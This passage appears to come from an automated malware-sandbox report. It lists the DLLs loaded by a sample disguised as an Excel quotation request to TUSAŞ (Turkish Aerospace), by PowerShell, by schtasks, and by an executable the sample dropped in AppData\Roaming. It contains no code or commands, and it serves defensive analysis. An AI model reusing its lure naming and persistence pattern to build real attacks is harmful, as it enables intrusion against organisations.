Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
